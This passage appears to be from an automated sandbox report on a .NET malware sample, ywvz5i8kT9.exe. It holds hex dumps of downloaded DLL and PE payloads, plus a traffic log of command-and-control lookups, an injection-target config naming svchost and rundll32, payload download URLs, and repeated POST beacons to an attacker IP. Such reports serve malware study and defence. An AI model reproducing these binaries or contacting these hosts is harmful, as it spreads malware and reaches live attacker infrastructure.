0a 2a 1a 7e 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 7b 1d 00 00 04 2a 52 02 28 09 00 00 06 03 74 05 00 00 02 6f 09 00 00 06 fe 01 2a 36 03 2d 02 16 2a 02 03 6f 03 00 00 06 2a 36 02 03 75 05 00 00 02 6f 0b 00 00 06 2a 46 02 28 09 00 00 06 8c 37 00 00 02 6f 19 00 00 0a 2a 46 02 28 09 00 00 06 8c 37 00 00 02 6f 1a 00 00 0a 2a 00 13 30 05 00 43 00 00 00 01 00 00 11 04 4a 05 58 0a 04 4a 06 33 02 14 2a 03 04 25 4a 25 0c 17 58 54 08 91 0b 07 0d 09 45 02 00 00 00 02 00 00 00 08 00 00 00 2b 0c 28 07 00 00 06 2a 28 08 00 00 06 2a 07 03 04 06 04 4a 59 28 1b 00 00 0a 2a 00 13 30 04 00 12 00 00 00 02 00 00 11 03 04 25 4a 25 0a 17 58 54 06 02 28 09 00 00 06 9c 2a 3a 02 28 06 00 00 06 02 03 7d 1d 00 00 04 2a 5e 16 73 8c 02 00 06 80 1b 00 00 04 17 73 8c 02 00 06 80 1c 00 00 04 2a 00 00 00 13 30 04 00 1b 00 00 00 02 00 00 11 02 03 04 28 10 00 00 06 03 04 25 4a 25 0a 17 58 54 06 02 6f 01 00 00 06 d2 9c 2a 22 02 03 28 11 00 00 06 2a 1e 02 7b 23 00 00 04 2a 1e 02 7b 22 00 00 04 2a 42 19 1a 02 28 16 00 00 06 6f 1c 00 00 0a 5a 58 2a 0a 17 2a c2 03 2d 02 16 2a 02 03 6f 03 00 00 06 2c 20 02 28 15 00 00 06 03 6f 15 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL[L!^>\| @ l@{KD{ H.textD\ ^ `.rsrc`@@.relocd@B \|HpP "-f\|]?m??A0#J;>,d}C8;O)JL<<H)`(@UR(A;`ONLK_/6jl&f>Na7-T\>(~~{R(to6-o6uoF(7oF(7o0CJXJ3%J%XTE+((JY(0%J%XT(:(}^ss0(%J%XTo"({#{"B(oZX*-o, (o
Apr 19, 2022 16:44:48.051641941 CEST	15900	OUT	GET /Vv/1/PcapDotNet.Analysis_64.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:48.347393990 CEST	15901	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Tue, 09 Nov 2021 09:06:20 GMT Accept-Ranges: bytes ETag: "08e7ef49d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:47 GMT Content-Length: 94720 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 4a 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 6a 01 00 00 06 00 00 00 00 00 00 fe 87 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 6c 4c 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 87 01 00 4f 00 00 00 00 a0 01 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 68 01 00 00 20 00 00 00 6a 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 03 00 00 00 a0 01 00 00 04 00 00 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 87 01 00 00 00 00 00 48 00 00 00 02 00 05 00 30 c1 00 00 7c c6 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e5 92 e8 75 c1 6f 03 3c 21 cb 8d 71 91 eb 85 00 67 19 f9 fe 42 10 2f 0b a0 7f d9 bb df ca ff f8 ce e3 57 bb c6 be 70 18 d7 b5 77 74 5c af f4 58 c1 e9 ae 2f 7b 24 8e 22 7c 3d 61 47 a8 15 04 ba 06 6b ad e5 67 61 4c c5 23 6f cc f1 64 c7 24 ce 86 ef c4 9c c3 11 b5 ca ca 39 5d 11 2c e9 cb a2 a9 32 96 26 d3 98 cd d4 b4 a6 68 6c 6d 85 8b 6b 33 51 07 ac e3 4d 73 7c 03 c2 5b 06 3f aa 94 75 13 30 08 00 5a 00 00 00 01 00 00 11 02 6f d5 00 00 0a 0a 20 88 dc 7a 3c 03 58 0b 16 25 17 32 33 25 0c 06 08 06 08 92 25 20 ff 00 00 00 5f 07 25 17 58 0b 61 d2 0d 25 1e 63 07 25 17 58 0b 61 d2 13 04 26 11 04 09 13 04 0d 11 04 1e 62 09 60 d1 9d 17 58 25 06 8e 69 32 c7 26 06 73 d6 00 00 0a 28 d7 00 00 0a 2a 00 00 13 30 02 00 15 00 00 00 00 00 00 00 02 25 28 21 00 00 0a 03 7d 01 00 00 04 02 04 7d 02 00 00 04 2a 00 00 00 13 30 01 00 07 00 00 00 00 00 00 00 02 7b 01 00 00 04 2a 00 13 30 01 00 07 00 00 00 00 00 00 00 02 7b 02 00 00 04 2a 00 13 30 02 00 1c 00 00 00 00 00 00 00 03 2d 0d 7e 06 00 00 04 02 6f ab 01 00 06 2b 0b 7e 06 00 00 04 02 6f aa 01 00 06 2a 13 30 08 00 7b 00 00 00 02 00 00 11 03 80 05 00 00 04 7e 03 00 00 04 2d 5c 02 80 04 00 00 04 02 73 31 02 00 06 0a 06 06 72 01 00 00 70 72 1f 00 00 70 6f 3c 02 00 06 06 16 6f 4c 02 00 06 06 17 6f 4a 02 00 06 06 17 6f 48 02 00 06 7e 05 00 00 04 2d 11 06 72 a8 00 00 70 16 8c 18 00 00 01 6f 3c 02 00 06 06 04 28 07 00 00 06 28 4f 02 00 06 80 03 00 00 04 7e 06 00 00 04 2d 0a 73 ad 01 00 06 80 06 00 00 04 2a 00 03 30 05 00 46 00 00 00 00 00 00 00 02 03 6f 40 02 00 06 02 72 d4 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJL!j @ lL@O H.texth j `.rsrcl@@.relocp@BH0\|P uo<!qgB/Wpwt\X/{$"\|=aGkgaL#od$9],2&hlmk3QMs\|[?u0Zo z<X%23%% _%Xa%c%Xa&b`X%i2&s(0%(!}}0{0{0-~o+~o0{~-\s1rprpo<oLoJoH~-rpo<((O~-s0Fo@r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49767	45.135.48.153	80	C:\Users\user\Desktop\ywvz5i8kT9.exe

Timestamp	kBytes transferred	Direction	Data
Apr 19, 2022 16:45:03.054878950 CEST	16008	OUT	GET /Vv/Ip.json HTTP/1.1 Host: 45.135.48.153 Connection: Keep-Alive
Apr 19, 2022 16:45:03.343389034 CEST	16008	IN	HTTP/1.1 200 OK Content-Type: application/json Last-Modified: Thu, 14 Apr 2022 14:15:43 GMT Accept-Ranges: bytes ETag: "89d7b820a50d81:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:45:02 GMT Content-Length: 14 Data Raw: 31 31 33 2e 32 31 32 2e 38 38 2e 31 32 36 Data Ascii: 113.212.88.126

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49768	113.212.88.126	80	C:\Windows\SysWOW64\RuntimeBroker.exe

Timestamp	kBytes transferred	Direction	Data
Apr 19, 2022 16:45:03.641254902 CEST	16008	OUT	GET /Vv/Ip.json HTTP/1.1 Host: 113.212.88.126 Connection: Keep-Alive
Apr 19, 2022 16:45:03.934555054 CEST	16009	IN	HTTP/1.1 200 OK Content-Type: application/json Last-Modified: Sat, 20 Nov 2021 10:32:27 GMT Accept-Ranges: bytes ETag: "395e5aeaf9ddd71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:45:03 GMT Content-Length: 14 Data Raw: 31 31 33 2e 32 31 32 2e 38 38 2e 31 32 36 Data Ascii: 113.212.88.126
Apr 19, 2022 16:45:06.336380005 CEST	16010	OUT	GET /Vv/resource.json HTTP/1.1 Host: 113.212.88.126
Apr 19, 2022 16:45:06.630842924 CEST	16011	IN	HTTP/1.1 200 OK Content-Type: application/json Last-Modified: Tue, 09 Nov 2021 09:06:18 GMT Accept-Ranges: bytes ETag: "0614de49d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:45:05 GMT Content-Length: 81 Data Raw: 73 76 63 68 6f 73 74 2c 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 4f 57 36 34 5c 73 76 63 68 6f 73 74 2e 65 78 65 7c 72 75 6e 64 6c 6c 33 32 2c 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 4f 57 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 Data Ascii: svchost,C:\Windows\SysWOW64\svchost.exe\|rundll32,C:\Windows\SysWOW64\rundll32.exe
Apr 19, 2022 16:45:06.631278038 CEST	16011	OUT	GET /Vv/1/process.json HTTP/1.1 Host: 113.212.88.126
Apr 19, 2022 16:45:06.925211906 CEST	16011	IN	HTTP/1.1 200 OK Content-Type: application/json Last-Modified: Tue, 09 Nov 2021 09:06:20 GMT Accept-Ranges: bytes ETag: "08e7ef49d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:45:05 GMT Content-Length: 118 Data Raw: 32 30 32 31 30 35 32 39 30 30 35 32 30 31 2c 52 75 6e 54 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 2c 68 74 74 70 3a 2f 2f 61 31 32 31 32 2e 6d 65 2f 56 76 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 42 69 6e 5f 33 32 2e 65 78 65 2c 68 74 74 70 3a 2f 2f 61 31 32 31 32 2e 6d 65 2f 56 76 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 42 69 6e 5f 36 34 2e 65 78 65 Data Ascii: 20210529005201,RunTimeBroker.exe,http://a1212.me/Vv/RuntimeBrokerBin_32.exe,http://a1212.me/Vv/RuntimeBrokerBin_64.exe

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49769	113.212.88.126	88	C:\Windows\SysWOW64\RuntimeBroker.exe

Timestamp	kBytes transferred	Direction	Data
Apr 19, 2022 16:45:05.609936953 CEST	16009	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 65 Expect: 100-continue Connection: Keep-Alive
Apr 19, 2022 16:45:05.899080992 CEST	16009	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:06.203747034 CEST	16010	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:05 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:06.466101885 CEST	16010	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:06.755173922 CEST	16011	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:07.052985907 CEST	16012	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:06 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:10.002204895 CEST	16012	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:10.291496992 CEST	16012	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:10.595854044 CEST	16013	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:10 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:13.060781002 CEST	16013	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:13.350055933 CEST	16013	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:13.645298958 CEST	16014	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:12 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:16.075954914 CEST	16014	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:16.365051985 CEST	16014	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:16.663182974 CEST	16015	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:16 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:19.771356106 CEST	16015	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:20.060776949 CEST	16015	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:20.355366945 CEST	16104	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:19 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:23.014915943 CEST	16143	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:23.306710005 CEST	16144	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:23.602921963 CEST	16144	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:22 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:26.671067953 CEST	16346	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:26.960305929 CEST	16350	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:27.257553101 CEST	16383	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:26 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:29.654850006 CEST	16518	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:29.944087029 CEST	16598	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:30.252226114 CEST	16602	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:29 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:32.625231028 CEST	17027	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:32.914465904 CEST	17035	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:33.224149942 CEST	17069	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:32 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:35.841542959 CEST	17282	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:36.130810976 CEST	17286	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:36.438806057 CEST	17318	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:36.831617117 CEST	17319	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:36 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:40.597845078 CEST	24798	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:40.887056112 CEST	24814	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:41.192748070 CEST	24815	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:40 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:43.499927998 CEST	25296	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:43.789417028 CEST	25334	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:44.085093021 CEST	25368	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:42 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:46.390804052 CEST	25368	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:46.680084944 CEST	25368	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:46.975462914 CEST	25369	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:46 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:49.235294104 CEST	25369	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:49.524811029 CEST	25369	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:49.823565006 CEST	25370	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:48 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:52.094237089 CEST	25370	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:52.383934975 CEST	25370	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:52.679465055 CEST	25371	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:52 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:54.913202047 CEST	25371	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:55.204018116 CEST	25371	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:55.500165939 CEST	25372	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:55 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:45:57.799890041 CEST	25372	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:45:58.089505911 CEST	25372	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:45:58.385639906 CEST	25373	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:45:57 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:46:00.673330069 CEST	25373	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:46:00.962768078 CEST	25373	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:01.258985996 CEST	25374	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:46:01 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:46:03.501610994 CEST	25379	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:46:03.791145086 CEST	25379	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:04.087753057 CEST	25380	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:46:03 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:46:06.408015013 CEST	25380	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:46:06.697170019 CEST	25380	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:07.007862091 CEST	25381	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:46:06 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:46:09.332918882 CEST	25381	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:46:09.622876883 CEST	25381	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:09.923511982 CEST	25382	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:10.260292053 CEST	25383	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:46:10 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:46:13.846103907 CEST	25396	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:46:14.135184050 CEST	25397	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:14.434324026 CEST	25397	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:46:13 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:46:16.486826897 CEST	25398	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:46:16.776184082 CEST	25398	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:17.073154926 CEST	25398	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:46:16 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
Apr 19, 2022 16:46:19.128073931 CEST	25399	OUT	POST /log HTTP/1.1 Host: 113.212.88.126:88 Content-Length: 67 Expect: 100-continue
Apr 19, 2022 16:46:19.417387962 CEST	25399	IN	HTTP/1.1 100 Continue
Apr 19, 2022 16:46:19.716344118 CEST	25399	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST,GET Access-Control-Allow-Headers: Accept, Origin, Content-type Date: Tue, 19 Apr 2022 14:46:19 GMT Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ywvz5i8kT9.exePID: 6280, Parent PID: 3196

General

Target ID:	0
Start time:	16:44:07
Start date:	19/04/2022
Path:	C:\Users\user\Desktop\ywvz5i8kT9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ywvz5i8kT9.exe"
Imagebase:	0xf70000
File size:	86016 bytes
MD5 hash:	375B713F2E3C2018DA424666C6BE9059
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6788, Parent PID: 564

General

Target ID:	4
Start time:	16:44:25
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
